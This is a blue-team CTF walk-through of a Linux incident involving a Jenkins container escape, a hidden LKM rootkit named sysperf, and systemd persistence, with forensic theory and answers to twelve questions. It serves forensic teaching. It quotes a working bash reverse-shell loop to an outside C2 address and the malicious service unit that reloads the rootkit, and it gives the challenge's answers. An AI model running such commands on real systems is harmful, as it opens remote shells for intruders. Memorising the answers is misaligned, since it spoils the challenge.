Platform: CyberDefenders | Category: Blue Team CTF | Date: March 2026
Challenge Link: ContainerBreak: Rootkit Trail on CyberDefenders
This document serves two purposes. First, it is a complete walk-through of the ContainerBreak: Rootkit Trail CTF challenge on CyberDefenders. Second, it is a learning guide. Each section explains not just what the answer is, but why you look there, what the artifact means, and what to consider in a real investigation. The theory sections (Part 1) provide the foundational knowledge needed to understand the investigation. Read Part 1 before Part 2.
PART 1: FOUNDATIONAL THEORY
What you need to know before you open the evidence
Topic 1: Linux Filesystem and Log Architecture
The Filesystem Hierarchy
Linux follows a standard called the Filesystem Hierarchy Standard (FHS). Every directory has a defined purpose. Knowing the layout tells you where to look for evidence before you start searching.
| Directory | Forensic Purpose |
|---|---|
| `/var/log` | Primary log directory. Contains syslog, auth.log, kern.log, and application logs. |
| `/var/log/auth.log` | Authentication events. SSH logins, sudo usage, user creation. |
| `/var/log/kern.log` | Kernel messages. Module loads, driver events, kernel errors. |
| `/etc` | System configuration files. User accounts, SSH config, cron jobs, services. |
| `/etc/passwd` | User account database. All accounts including service accounts. |
| `/etc/shadow` | Password hashes. Shows when passwords were last changed. |
| `/etc/crontab` | Scheduled tasks. Common persistence mechanism. |
| `/tmp` and `/dev/shm` | Temporary storage. World-writable. Attackers stage tools here. `/dev/shm` is RAM-backed and leaves no disk trace. |
| `/home` and `/root` | User home directories. Contains `.bash_history`, SSH keys, personal configuration. |
| `/proc` | Virtual filesystem. Live process info, network connections, system state. Not on disk. |
| `/sys/module` | Virtual filesystem. One directory per loaded kernel module. Persists even when a rootkit removes its module list entry. |
| `/lib/modules` | Kernel module files organized by kernel version. Standard location for `.ko` files. |
The Three Logging Systems
Modern Linux systems run up to three separate logging systems simultaneously.
- journald (`systemd-journald`). Captures everything: kernel messages, service output, boot messages, and user sessions. Stores logs in binary format. Read with `journalctl`. By default, logs may be volatile and lost on reboot. Check `/etc/systemd/journald.conf` for the `Storage` setting.
- rsyslog (or `syslog-ng`). The traditional syslog daemon. Receives messages and writes them to text files in `/var/log/` based on rules in `/etc/rsyslog.conf`. This creates files like `auth.log` and `kern.log`.
- auditd. The Linux audit framework. Provides granular logging of system calls, file access, and user actions. Writes to `/var/log/audit/audit.log`. Captures events that syslog and journald do not, including syscall-level activity.
The Event Flow
When an event occurs on a Linux system:
- The kernel or service generates a log message.
- journald captures the message first (if systemd is running).
- journald forwards the message to rsyslog (if configured).
- rsyslog writes the message to the appropriate text file.
- auditd independently captures syscall-level events to `audit.log`.
Key Principle: Always check the logging configuration before trusting log content. If the attacker modified `/etc/rsyslog.conf` or stopped journald, logs may be incomplete. The configuration files are your first checkpoint.
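As a quick sanity check, the `Storage` setting can be pulled straight out of the config. A minimal sketch follows; the sample `journald.conf` here is fabricated for demonstration, and on a real collection you would read `[root]/etc/systemd/journald.conf` instead:

```shell
# Create a sample journald.conf for demonstration purposes only.
cat > journald.conf <<'EOF'
[Journal]
#Storage=auto
Storage=persistent
EOF

# Only uncommented Storage= lines count. 'persistent' means journals
# survive reboot; 'volatile' means they are lost at shutdown.
grep -E '^[[:space:]]*Storage=' journald.conf
```

If no uncommented `Storage=` line exists, journald falls back to its default behavior, so an empty grep result is itself a finding worth noting.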
Timestamps: mtime, atime, ctime
Every file on a Linux filesystem has three timestamps stored in its inode.
- mtime (Modify time): When the file content was last changed.
- atime (Access time): When the file was last read. Many systems mount with `noatime`, reducing atime updates.
- ctime (Change time): When the file metadata (permissions, ownership) was last changed. Cannot be set by normal user tools.
Key Principle — Timestomping Detection: Attackers can fake mtime and atime using the `touch` command. They cannot fake ctime through normal means. If a file has a recent ctime but an old mtime, someone likely changed the file and then backdated the mtime. The ctime catches the lie.
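The principle is easy to demonstrate with GNU `touch` and `stat` in a scratch directory (the filename is illustrative):

```shell
# Create a file: mtime, atime, and ctime are all set to now.
touch evidence.txt
# "Attacker" backdates mtime/atime to Jan 1 2020. The kernel updates
# ctime to the current time because the inode metadata changed.
touch -t 202001010000 evidence.txt
# %Y = mtime, %Z = ctime, both as seconds since the epoch.
stat -c 'mtime=%Y ctime=%Z' evidence.txt
```

The output shows an mtime from 2020 but a present-day ctime: the exact mismatch the key principle describes.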
Topic 2: How Kernel Rootkits Work
What a Kernel Rootkit Is
A kernel rootkit is malicious code that runs inside the operating system kernel. The kernel is the core of the OS. It controls processes, memory, files, network, and hardware access.
Code running in the kernel has the highest privilege level on the system. A rootkit at this level can hide processes, files, network connections, and itself from any tool running in userspace.
Loadable Kernel Modules (LKMs)
Linux allows code to be loaded into the running kernel at runtime. These are called Loadable Kernel Modules (LKMs). Legitimate uses include device drivers and filesystem drivers.
An attacker can write a malicious LKM and load it into the kernel. Once loaded, it runs with full kernel privileges. This is the most common method for deploying a kernel rootkit on Linux.
How an LKM Gets Loaded
- The attacker compiles a kernel module (`.ko` file) matching the target kernel version.
- The attacker gains root access (in this scenario, via container escape).
- The attacker loads the module using `insmod` or `modprobe`.
- The kernel calls `init_module`, triggering the module’s initialization function.
- The module runs inside the kernel with full privileges.
- The attacker deletes the `.ko` file to remove the installation artifact.
Key Principle: The module runs in kernel memory even after the `.ko` file is deleted from disk. Disk forensics may not find the module file. Memory forensics will find the loaded module.
Syscall Hooking: How the Rootkit Hides Things
A syscall (system call) is a request from a userspace program to the kernel. Every time a program reads a file, lists a directory, or opens a network connection, it makes a syscall. The kernel maintains a syscall table: an array of function pointers, one per syscall.
A rootkit hooks syscalls by replacing entries in this table with its own functions.
| Syscall | Normal Purpose | When Hooked |
|---|---|---|
| `getdents` / `getdents64` | List directory contents | Hides files and directories from `ls`, `find`, and similar tools. |
| `read` | Read file contents | Can filter log entries or file contents in real time. |
| `open` / `openat` | Open files | Can prevent access to specific files or redirect reads. |
| `kill` | Send signals to processes | Can hide specific processes from signal-based enumeration. |
| `recvmsg` | Receive network messages | Can filter network data from monitoring tools. |
Self-Concealment
A well-written rootkit removes its own entry from the kernel’s linked list of loaded modules after loading. This means lsmod and /proc/modules will not show it. The module code remains in kernel memory and continues executing.
However, the /sys/module/ filesystem directory for the module often persists. This discrepancy between /sys/module/ and lsmod is the primary detection technique for hidden LKM rootkits.
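A minimal sketch of this comparison on a live host follows. Output varies per system, and kernel built-in components also appear under `/sys/module`, so every hit requires manual triage rather than being treated as an automatic rootkit verdict:

```shell
# List names present under /sys/module but absent from lsmod.
ls /sys/module | sort > sys_modules.txt
# lsmod's first column (skipping the header) is the module name.
lsmod 2>/dev/null | awk 'NR > 1 {print $1}' | sort > lsmod_modules.txt
# comm -23 prints lines unique to the first file: the candidates.
comm -23 sys_modules.txt lsmod_modules.txt
```

Most hits will be built-ins, but a hidden LKM rootkit that unlinked itself from the module list shows up in exactly this set.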
MITRE ATT&CK Mapping
| Technique | ID | Relevance |
|---|---|---|
| Rootkit | T1014 | Kernel rootkit installation and syscall hooking for concealment. |
| Kernel Modules and Extensions | T1547.006 | Loading a malicious LKM for persistence. |
| Indicator Removal | T1070 | Deleting the .ko file after loading. Clearing logs. |
Topic 3: Container Escape Mechanics
What a Container Escape Is
A container escape is when an attacker breaks out of a container’s isolation boundary and gains access to the underlying host system.
Containers are not virtual machines. They share the host’s kernel. The isolation is provided by Linux kernel features: namespaces (what a process can see) and cgroups (what resources it can use). A container escape exploits a weakness in this isolation.
How Container Isolation Works
Namespaces control what a process can see. A container gets its own PID namespace (it sees only its own processes), mount namespace (it sees only its own filesystem), and network namespace (it has its own network stack).
Cgroups control what resources a process can use: CPU, memory, I/O limits. They do not provide security isolation. They provide resource management only.
The shared kernel is the critical detail. Every container on a host runs on the same kernel. If the kernel has a vulnerability, any container can potentially exploit it. The container boundary is a kernel-enforced policy. A kernel bug can break that policy.
Common Container Escape Methods
- Kernel Exploitation. The attacker exploits a vulnerability in the shared kernel from inside the container. A kernel exploit gives the attacker host-level kernel access. This is the most relevant method for this scenario.
- Privileged Container Abuse. If a container runs with `--privileged`, it has nearly unrestricted access to host devices and capabilities. An attacker can mount the host filesystem or load kernel modules without needing a kernel exploit.
- Misconfigured Mounts. If `/var/run/docker.sock` is mounted into a container, the attacker can create new privileged containers or access the host filesystem.
- Capability Abuse. Certain capabilities like `CAP_SYS_ADMIN` or `CAP_SYS_PTRACE` can be abused for escape if granted to the container.
Artifacts of a Container Escape
| Artifact | Location | What It Shows |
|---|---|---|
| Container overlay filesystem | `/var/lib/docker/overlay2/` | Files placed inside the container. Exploit binaries, tools, scripts. |
| Kernel logs | `/var/log/kern.log`, `journalctl -k` | Kernel exploitation artifacts. Crash dumps, unexpected module loads. |
| Audit logs | `/var/log/audit/audit.log` | Syscall-level events. `init_module` calls, capability usage. |
| Docker daemon logs | `/var/lib/docker/containers/` | Container-level activity. Command execution, error messages. |
| Process artifacts | `/proc` (live) or memory dump | Processes that originated in a container namespace but operate in the host namespace. |
Key Principle — The Golden Period: The time gap between the container escape and the rootkit load is the golden period. The attacker had root but no rootkit yet. Logs from this window are trustworthy because the rootkit was not yet active to filter them.
MITRE ATT&CK Mapping
| Technique | ID | Relevance |
|---|---|---|
| Escape to Host | T1611 | Container escape to host system. |
| Exploitation for Privilege Escalation | T1068 | Kernel or service exploit used to break container isolation. |
| Exploitation of Remote Services | T1210 | If the initial container compromise came from a network service. |
Topic 4: The Trust Problem
The Core Paradox
When a kernel rootkit is active, it controls the operating system. Every tool you run on that system asks the kernel for information. The kernel lies.
Standard commands like ps, ls, netstat, lsmod, and find cannot be trusted. The rootkit intercepts the requests these tools make and filters the results before they reach you. You will see exactly what the attacker wants you to see.
How It Works
Standard Linux tools operate in userspace. They make system calls (syscalls) to the kernel to get data.
A kernel rootkit hooks these syscalls. It intercepts the request, checks the real answer, removes anything it wants to hide, and returns the filtered answer. The program never knows the data was altered.
What Happens When You Run ps aux
- You run `ps aux` to list processes.
- `ps` makes a syscall to read `/proc`.
- The rootkit intercepts the read.
- The rootkit removes its hidden processes from the result.
- `ps` shows you a clean process list.
- The hidden processes keep running.
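The effect of such a hook can be sketched in userspace. This is purely illustrative: the real filtering happens inside the kernel's syscall path, and the process names and hide rule below are invented:

```python
# Userspace sketch of what a hooked getdents64-style filter does:
# call the real implementation, strip entries matching a hide rule,
# and return the filtered answer to the caller.
HIDDEN_PREFIX = "sysperf"  # hypothetical hide rule

def real_getdents():
    # What the unhooked kernel would return for a directory read.
    return ["bash", "sysperf_loader", "sshd", "cron"]

def hooked_getdents():
    # The hook filters the real answer before userspace ever sees it.
    return [name for name in real_getdents()
            if not name.startswith(HIDDEN_PREFIX)]

print(hooked_getdents())
```

The caller receives a plausible, internally consistent listing; nothing about the result reveals that `sysperf_loader` was removed. That is why live-system output cannot be trusted.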
What to Do About It
If you cannot trust the live system, get your evidence from sources the rootkit cannot control.
Approach 1: Memory Forensics. Acquire a full memory dump using LiME. Analyze it offline with Volatility. Memory analysis reads raw kernel structures directly. It does not ask the kernel to report on itself.
Approach 2: Disk Forensics on a Mounted Image. Take the disk image offline. Mount it read-only on a clean analysis workstation. The rootkit is not running on your analysis machine. Files the rootkit hid from ls on the live system will be visible.
Approach 3: Cross-Referencing. Compare what the live system reports against what raw evidence shows. Every discrepancy between what the live system claimed and what raw analysis reveals is a rootkit artifact.
Key Principle: Never trust the compromised system to tell the truth about itself. Always verify live findings against raw evidence sources the rootkit cannot control.
Topic 5: Linux Memory Forensics
What Memory Forensics Is
Memory forensics is the acquisition and analysis of a system’s volatile memory (RAM). Volatile memory contains everything the system is actively doing: running processes, open network connections, loaded kernel modules, encryption keys, and injected code.
When the system powers off, this data is lost. That is why it is called volatile.
Memory is the one evidence source a kernel rootkit cannot fully control after acquisition. In a raw memory dump analyzed offline, the kernel’s internal data structures are exposed exactly as they exist.
LiME: Acquiring Memory
LiME (Linux Memory Extractor) is the standard tool for Linux memory acquisition. LiME is a loadable kernel module itself. You compile it for the target system’s exact kernel version, load it, and it reads physical memory directly.
- Compile LiME for the target kernel version (must match exactly).
- Load the LiME module on the target system.
- LiME reads physical RAM and writes it to a file or streams it over TCP.
- Transfer the dump to your analysis workstation.
Volatility: Analyzing the Dump
Volatility is the primary framework for Linux memory forensics. It reads the raw memory dump and understands the kernel’s internal data structures. It needs a profile (Volatility 2) or symbol table (Volatility 3) that matches the exact kernel version.
| Plugin | Purpose | Scenario Relevance |
|---|---|---|
| `linux.pslist` | Lists running processes from the kernel’s task list. | Find processes hidden from `ps` on the live system. |
| `linux.pstree` | Shows processes in a parent-child tree. | Spot suspicious process relationships. |
| `linux.check_modules` | Compares the module list against modules found in memory. | Finds the hidden rootkit module removed from `lsmod`. |
| `linux.lsmod` | Lists loaded kernel modules from memory. | Compare against live `lsmod` output to find discrepancies. |
| `linux.sockstat` | Lists network connections from memory. | Find hidden network connections the rootkit concealed. |
| `linux.bash` | Recovers bash command history from memory. | Find attacker commands even if `.bash_history` was cleared. |
| `linux.check_syscall` | Examines the syscall table for modifications. | Direct evidence of rootkit activity. Modified pointers indicate syscall hooks. |
Key Principle: If you use the wrong profile or symbol table, Volatility cannot parse the dump. This is the most common failure point in Linux memory forensics. Always verify the kernel version from the disk image first.
PART 2: THE INVESTIGATION
ContainerBreak: Rootkit Trail — Full Walk-Through
The Forensic Collection
What We Are Working With
The evidence is a UAC (Unix-like Artifacts Collector) collection taken from a live compromised Linux server. The collection was made while the rootkit was still active.
This is important. Some live command output in the collection may have been filtered by the rootkit at the time of collection. We cross-reference multiple artifact sources throughout the investigation.
| Folder | Contents |
|---|---|
| `[root]` | Mirror of the host filesystem. Contains `/etc`, `/var/log`, `/lib/modules`, and all other system directories. |
| `live_response` | Output of live commands captured at collection time. Sub-folders: `system` (OS info), `process` (process lists), and more. |
| `hash_executables` | MD5 and SHA1 hashes of executables found on the system. |
| `bodyfile` | Filesystem metadata including MAC timestamps for timeline analysis. |
| `uac.log` | Collection tool log. Records what was captured and when. |
Reading This Collection: [root] is a filesystem snapshot. live_response is command output captured while the system was running. When the rootkit was active, live commands may return filtered results. Always cross-reference both sources.
The Attack Chain
Overview
Before answering individual questions, it helps to understand the full attack from beginning to end. This shapes your triage order and tells you what to look for at each stage.
| Stage | What Happened | How | Key Artifact |
|---|---|---|---|
| 1. Initial Access | Attacker accessed Jenkins web application | Jenkins exposed on port 8080 with CSRF protection disabled | ps_auxwwwf.txt |
| 2. Initial Shell | Reverse shell from inside the Jenkins container | `bash -i` to 185.220.101.50:4444 as `natsuiro_xcn` | ps_auxwwwf.txt |
| 3. Container Escape | Attacker broke out of the container to the host | Exploited container isolation to gain host root | Process tree, host process ownership |
| 4. Rootkit Install | Malicious LKM loaded into the host kernel | `insmod sysperf.ko` on host | kern.log, /sys/module, taint value |
| 5. Persistence | Systemd service created to reload rootkit on boot | `sysperf.service` calling `insmod` at startup | sysperf.service file |
| 6. C2 Shell | Persistent reverse shell loop running as root | `while true` bash loop to 185.220.101.50:9999 | ps_auxwwwf.txt PID 39303 |
Stage 1 and 2: Initial Access and Container Shell
What the Evidence Shows
The process tree in live_response/process/ps_auxwwwf.txt shows a Jenkins application running inside a Docker container. The container was accessible over the network.
What the Configuration Tells Us
Two flags in the Jenkins startup command are forensically significant.
- `-Djenkins.install.runSetupWizard=false`: The setup wizard was skipped. Jenkins was configured to start in an accessible state without requiring initial setup.
- `-Dhudson.security.csrf.GlobalCrumbIssuerConfiguration.DISABLE_CSRF_PROTECTION=true`: CSRF protection was explicitly disabled. This is a known attack enabler. It allows attackers to execute Jenkins scripts remotely without a valid CSRF token.
These flags did not appear by accident. This was a deliberately misconfigured Jenkins instance, likely used as a development or testing environment. That misconfiguration was the attacker’s entry point.
The Initial Reverse Shell
The process tree shows a bash reverse shell spawned as a child of the Java process:
This shell ran as the natsuiro_xcn user inside the Jenkins container. At this stage, the attacker had access to the container environment but not the host.
The attacker connected to 185.220.101.50 on port 4444. This is the same C2 server that later received the root-level persistent shell on port 9999.
What This Means for the Investigation
The initial access came through Jenkins, not through SSH or a direct host exploit. The attack began inside a container, which means the attacker needed to escape the container to reach the host.
This sets up Stage 3.
Stage 3: Container Escape
How We Know an Escape Occurred
The process tree shows the critical transition. The initial shell ran as natsuiro_xcn inside the container namespace. But subsequent activity shows root-owned processes running in the host namespace.
Looking at the process tree around PID 24860:
This sudo/su chain ran from the natsuiro_xcn SSH session at 23:14. The attacker escalated from natsuiro_xcn to root. This is consistent with a privilege escalation that also broke the container boundary.
Evidence of the Escape in the Process Tree
After the container escape, the attacker had processes running as root in the host namespace. The ps_auxwwwf.txt shows multiple root-owned bash processes that are not associated with any legitimate service.
The process at PID 39303 is the clearest evidence:
This process runs as root. It was started from a host-level context, not from inside the Jenkins container. If the attacker had not escaped the container, this process would run as natsuiro_xcn.
The Transition Timeline
From kern.log and the process data:
- 23:15: Second system boot. System comes up. Kernel `5.4.0-216-generic` active.
- 23:16: Attacker’s initial container shell established (PIDs 24903, 24904 as `natsuiro_xcn`).
- 23:31:36: Rootkit (`sysperf`) loaded into the host kernel. Attacker is already root on the host by this point.
The approximately 15-minute window between the container shell and the rootkit load is the golden period. The attacker was operating as root on the host but had not yet installed the rootkit. Log entries from this window are trustworthy.
What to Consider in a Real Investigation
Container Escape Forensics: In a full investigation, you would also examine /var/lib/docker/overlay2/ to find files the attacker placed inside the container before the escape. Exploit binaries, tools, and scripts are often staged in /tmp inside the container. These files persist in the overlay layers even after the container stops.
What We Could Not Determine: The exact exploit used for the container escape was not confirmed in this investigation. The evidence shows the result (root on host) but not the specific escape technique. A full investigation would examine the Docker daemon logs, container capability configuration, and any kernel error messages from the escape period.
Discovery Questions (Q1–Q3)
Q1: Kernel Version
Question
What is the exact kernel version of the compromised Ubuntu server?
Where to Look
For a UAC collection, go to live_response/system/. The file uname_-a.txt contains output from uname -a, which reports the kernel version as seen by the running system at collection time.
A Complication
In this case, the journal boot messages showed a different kernel version (6.8.0-1013-aws) than uname reported (5.4.0-216-generic). This happened because the journal contained entries from an earlier boot on a different kernel.
The uname -a output reflects what was actually running at collection time. For forensic questions about the state of the compromised system, this is the authoritative source.
Answer
| Field | Value |
|---|---|
| Kernel Version | 5.4.0-216-generic |
| Artifact | live_response/system/uname_-a.txt |
Q2: Hostname
Question
What is the hostname of the compromised system?
Where to Look
The hostname is stored at /etc/hostname on every Linux system. In the collection this is [root]/etc/hostname.
The hostname can be cross-referenced against the collection folder name (uac-wowza-linux-...) and against the journal log lines which prefix each entry with the system hostname.
Answer
| Field | Value |
|---|---|
| Hostname | wowza |
| Artifact | [root]/etc/hostname |
Q3: Kernel Taint Value
Question
What is the current kernel taint value at the time of collection?
What a Taint Value Means
The Linux kernel maintains a taint flag: a bitmask where each bit represents a condition that makes the kernel state less trusted. Loading an unsigned, externally built module sets specific taint bits.
A value of 12288 has two bits set: bit 12 (out-of-tree module loaded, value 4096) and bit 13 (unsigned module loaded, value 8192). This is consistent with a rootkit built outside the kernel source tree and loaded without a valid module signature.
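The decoding can be sketched in a few lines of Python. Only the taint bits relevant here are mapped; the kernel defines many more (see the kernel's tainted-kernels documentation for the full table):

```python
# Decode a Linux kernel taint bitmask. Each set bit flags one condition.
TAINT_BITS = {
    0:  "P: proprietary module loaded",
    12: "O: out-of-tree module loaded",
    13: "E: unsigned module loaded",
}

def decode_taint(value):
    """Return the descriptions for every mapped bit set in value."""
    return [desc for bit, desc in sorted(TAINT_BITS.items())
            if value >> bit & 1]

print(decode_taint(12288))  # bits 12 and 13: 4096 + 8192 = 12288
```

Running this against the collected value confirms the out-of-tree and unsigned-module flags, exactly what an externally compiled, manually loaded rootkit produces.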
Where to Look
The file live_response/system/cat_proc_sys_kernel_tainted.txt contains the taint value from /proc/sys/kernel/tainted.
Answer
| Field | Value |
|---|---|
| Taint Value | 12288 |
| Meaning | Out-of-tree module + Unsigned module loaded |
| Artifact | live_response/system/cat_proc_sys_kernel_tainted.txt |
Rootkit Discovery (Q4–Q7)
Q4: Malicious Module Name
Question
A malicious kernel module was loaded on the compromised machine. What is the name of this module?
The Detection Technique
A rootkit removes its own entry from the kernel’s linked list of loaded modules. This makes it invisible to lsmod and /proc/modules. However, when a module loads, the kernel creates a directory for it in /sys/module/. This directory often persists even after the linked list entry is removed.
Comparing these two sources reveals hidden modules.
How to Compare
Both sources are in the collection:
- `live_response/system/ls_-la_sys_module.txt`: directory listing of `/sys/module/`
- `live_response/system/lsmod.txt`: output of the `lsmod` command
To compare efficiently, extract just the module names from each file and diff them:
```shell
# Last field of each ls -la line is the module directory name.
awk '{print $NF}' ls_-la_sys_module.txt | sort > sys_clean.txt
# First field of each lsmod line is the module name.
awk '{print $1}' lsmod.txt | sort > lsmod_clean.txt
# Lines unique to sys_clean.txt are candidates for hidden modules.
diff sys_clean.txt lsmod_clean.txt
```
The name sysperf appeared in /sys/module/ but not in lsmod. This is the hidden rootkit module.
The module identified itself as SysPerfMon in kernel log messages, disguised as a “System Performance Monitoring Service”. The filename on disk was sysperf.ko.
Answer
| Field | Value |
|---|---|
| Module Name | sysperf |
| Display Name | SysPerfMon (System Performance Monitoring Service) |
| Artifacts | live_response/system/ls_-la_sys_module.txt vs lsmod.txt |
Q5: dmesg Timestamp of Module Load
Question
At what dmesg timestamp was the rootkit module first loaded?
What a dmesg Timestamp Is
The kernel ring buffer uses timestamps measured in seconds since the kernel started booting. The format is seconds.microseconds. These are relative times, not wall-clock times.
Where to Look
The file live_response/system/modules_tainting_the_kernel_dmesg.txt contains kernel log entries related to module tainting. It shows two entries for sysperf:
The first entry marks when the module load began. The signature verification failure is a separate event, logged 782 microseconds later.
Answer
| Field | Value |
|---|---|
| dmesg Timestamp | 9127.292300 |
| Artifact | live_response/system/modules_tainting_the_kernel_dmesg.txt |
Q6: Absolute UTC Timestamp of Rootkit Load
Question
What is the absolute UTC timestamp when the rootkit was loaded?
The Direct Approach
rsyslog records kernel messages to /var/log/kern.log with real wall-clock timestamps. This is faster and more reliable than calculating from the dmesg offset.
In [root]/var/log/kern.log:
The wall-clock timestamp is directly readable: November 24, 2025 at 23:31 UTC.
The Trust Consideration
kern.log was written by rsyslog on the live system. A rootkit could theoretically modify log entries. In a full investigation, you would cross-reference this timestamp against the binary journal (read with journalctl -D) and any memory dump artifacts.
For this collection, the kern.log timestamp was not tampered with, as confirmed by the CTF answer.
The Calculation Approach (When kern.log Is Unavailable)
If kern.log had been deleted: add the dmesg offset (9127 seconds = 2 hours, 32 minutes, 7 seconds) to the exact boot time. The second boot started at 2025-11-21 23:15:53 UTC per journalctl --list-boots. However, the sysperf load occurred during a later session (Nov 24), making this calculation significantly more complex.
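The naive arithmetic can be sketched directly. Note that it lands on Nov 22, not the Nov 24 date recorded in kern.log, which demonstrates why an offset from a later session cannot simply be added to the second boot time:

```python
from datetime import datetime, timedelta, timezone

# Boot time from journalctl --list-boots; dmesg offset from Q5.
boot = datetime(2025, 11, 21, 23, 15, 53, tzinfo=timezone.utc)
load = boot + timedelta(seconds=9127)  # 9127 s = 2 h 32 m 7 s
print(load.isoformat())  # 2025-11-22T01:48:00+00:00
```

Whenever the naive result contradicts a wall-clock log source, trust the wall-clock source and re-examine which boot the dmesg counter actually belongs to.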
Answer
| Field | Value |
|---|---|
| UTC Timestamp | 2025-11-24 23:31 |
| Artifact | [root]/var/log/kern.log |
Q7: C2 Server IP and Port
Question
What C2 server IP address and port are configured in the rootkit?
Where to Look
When a kernel module loads, its initialization function may print messages to the kernel ring buffer. These appear in kern.log and in journalctl output.
The sysperf rootkit logged its C2 configuration on initialization:
What This Tells Us
This is an operational security failure by the attacker. The rootkit logged its own C2 address. This likely happened because the developer expected the attacker to clean up kern.log after installation. In this case, the log was preserved in the UAC collection.
The IP address 185.220.101.50 is a known Tor exit node. This is consistent with an attacker routing traffic through Tor to obscure their origin.
Answer
| Field | Value |
|---|---|
| C2 IP and Port | 185.220.101.50:9999 |
| Artifact | [root]/var/log/kern.log |
Persistence (Q8–Q9)
Q8: Systemd Service File Path
Question
The threat actor created a systemd service to maintain persistence. What is the full path to this service file?
Where to Look
Attackers commonly create systemd service units for persistence. These files live in /etc/systemd/system/ on the host filesystem.
In the collection: [root]/etc/systemd/system/. A file named sysperf.service was present, matching the rootkit module name.
What Systemd Persistence Means
A service unit in /etc/systemd/system/ that is enabled runs on every boot. Even if the rootkit is cleared from memory, a reboot will reload it automatically unless this file is also removed.
This is a two-step remediation requirement: disable the service and remove the module file. Doing only one is insufficient.
Answer
| Field | Value |
|---|---|
| Service File Path | /etc/systemd/system/sysperf.service |
| Artifact | [root]/etc/systemd/system/sysperf.service |
Q9: ExecStart Command in Service File
Question
The systemd service file specifies a command to run upon startup. What is the exact command?
Reading the Service File
The full sysperf.service content:
```ini
[Unit]
Description=System Performance Monitoring Service
After=network.target
DefaultDependencies=no

[Service]
Type=oneshot
ExecStart=/sbin/insmod /lib/modules/sysperf.ko
RemainAfterExit=yes
StandardOutput=null
StandardError=null

[Install]
WantedBy=multi-user.target
```
What Each Field Tells Us
- `ExecStart=/sbin/insmod /lib/modules/sysperf.ko`: Uses `insmod` to load the rootkit kernel module from `/lib/modules/sysperf.ko` on every boot.
- `StandardOutput=null` / `StandardError=null`: Suppresses all output. This prevents the insmod activity from appearing in the systemd journal.
- `Type=oneshot` + `RemainAfterExit=yes`: The service runs once and exits. Systemd considers it active even after the command completes.
- `DefaultDependencies=no`: The service starts as early as possible in the boot sequence, before most other services.
Note: The module is stored in `/lib/modules/` instead of the standard path `/lib/modules/[kernel-version]/`. This is a deliberate deviation from convention to avoid detection tools that scan the standard kernel module paths.
Answer
| Field | Value |
|---|---|
| ExecStart Command | /sbin/insmod /lib/modules/sysperf.ko |
| Artifact | [root]/etc/systemd/system/sysperf.service |
Reverse Shell and Rootkit Hash (Q10–Q12)
Q10: PID of Reverse Shell Loop Process
Question
The systemd service persistence results in a root-owned process that maintains a reverse shell loop. What is the PID of this process?
Where to Look
Process information lives in live_response/process/. The key file is ps_auxwwwf.txt: a full process tree with complete command lines.
Because we know the C2 IP (185.220.101.50) and port (9999), we can search for it directly:
PID 39303 is the parent process maintaining the loop. PID 40565 is a child process spawned by the loop. The question asks for the persistent loop process: 39303.
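The lookup itself is a one-liner. In the sketch below, the process line is a hypothetical stand-in for the real `ps_auxwwwf.txt` content, which lives in the evidence collection:

```shell
# HYPOTHETICAL stand-in for one line of ps_auxwwwf.txt; in the real
# collection you grep the actual file for the known C2 address.
printf 'root 39303 bash -c "while true; do bash -i >& /dev/tcp/185.220.101.50/9999 0>&1; sleep 30; done"\n' > ps_sample.txt
# Escape the dots so grep matches the literal IP, not any character.
grep -n '185\.220\.101\.50' ps_sample.txt
```

Pivoting on a known IOC (the C2 address) is faster and less error-prone than reading the full process tree line by line.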
The Trust Angle
The file hidden_pids_for_ps_command.txt shows only one PID: 113064. This PID does not appear in ps_auxwwwf.txt at all, meaning it was completely hidden from the standard process list. The process at PID 39303 was not hidden from ps, suggesting the rootkit did not configure itself to hide this specific process. This is another indicator of incomplete operational security.
Answer
| Field | Value |
|---|---|
| Process PID | 39303 |
| Artifact | live_response/process/ps_auxwwwf.txt |
Q11: Full Reverse Shell Command
Question
What is the full command line of the persistent reverse shell?
The Command
```shell
while true; do bash -i >& /dev/tcp/185.220.101.50/9999 0>&1; sleep 30; done
```
Breaking Down the Command
- `while true; do ... done`: An infinite loop that runs forever.
- `bash -i`: Starts an interactive bash shell. The `-i` flag enables job control and interactive features.
- `>& /dev/tcp/185.220.101.50/9999`: Redirects both stdout (1) and stderr (2) to a TCP connection to the C2 server on port 9999.
- `0>&1`: Redirects stdin (0) to come from the same TCP connection. This creates a bidirectional shell.
- `sleep 30`: Waits 30 seconds before reconnecting if the connection drops. This makes the shell resilient to network interruptions.
This is a standard bash reverse shell loop. It requires no additional tools beyond bash itself. All network connectivity uses bash’s built-in /dev/tcp feature, which does not require netcat or other utilities.
Answer
| Field | Value |
|---|---|
| Full Command | while true; do bash -i >& /dev/tcp/185.220.101.50/9999 0>&1; sleep 30; done |
| Artifact | live_response/process/ps_auxwwwf.txt |
Q12: SHA256 Hash of Rootkit Module
Question
What is the SHA256 hash of the rootkit kernel module?
Where to Look
The hash_executables folder contains MD5 and SHA1 hashes of standard executables. It does not include the rootkit module, because the collection only hashes binaries in standard executable paths, not kernel modules.
The sysperf.ko file exists in the collection at [root]/lib/modules/sysperf.ko. Calculate the SHA256 hash directly:
sha256sum '[root]/lib/modules/sysperf.ko'
Why This Matters
A SHA256 hash uniquely identifies a specific build of the rootkit. This hash can be submitted to threat intelligence platforms such as VirusTotal or MalwareBazaar to check whether this rootkit is a known tool, who has used it before, and whether behavioral analysis exists.
It also serves as an IOC. If this hash appears on another system in your environment, you have immediate confirmation that the same rootkit was deployed there.
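An IOC sweep can be scripted in one pipeline. The sketch below builds a stand-in directory tree and hashes its own file so it stays self-contained; in practice, point `ROOT` at the mounted collection (or a live filesystem) and set `IOC` to the known-bad hash above:

```shell
# Flag any file under ROOT whose SHA256 matches a known-bad hash.
ROOT=/tmp/ioc_demo                                  # stand-in for the mounted [root] tree
mkdir -p "$ROOT/lib/modules"
printf 'stand-in module bytes' > "$ROOT/lib/modules/sysperf.ko"
IOC=$(sha256sum "$ROOT/lib/modules/sysperf.ko" | awk '{print $1}')   # demo hash only
find "$ROOT" -type f -exec sha256sum {} + | grep -F "$IOC"
```

Hashing every file is slow on large trees; scoping `find` to module and binary paths (`/lib/modules`, `/usr/bin`, `/tmp`) is usually enough for a first pass.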
Answer
| Field | Value |
|---|---|
| SHA256 | ded20890c28460708ea1f02ef50b6e3b44948dbe67d590cc6ff2285241353fd8 |
| Artifact | [root]/lib/modules/sysperf.ko |
PART 3: REFERENCE MATERIAL
Complete answers, IOCs, timeline, and key lessons
Complete Answer Summary
| Q | Question | Answer |
|---|---|---|
| 1 | Kernel version | 5.4.0-216-generic |
| 2 | Hostname | wowza |
| 3 | Kernel taint value | 12288 |
| 4 | Malicious kernel module name | sysperf |
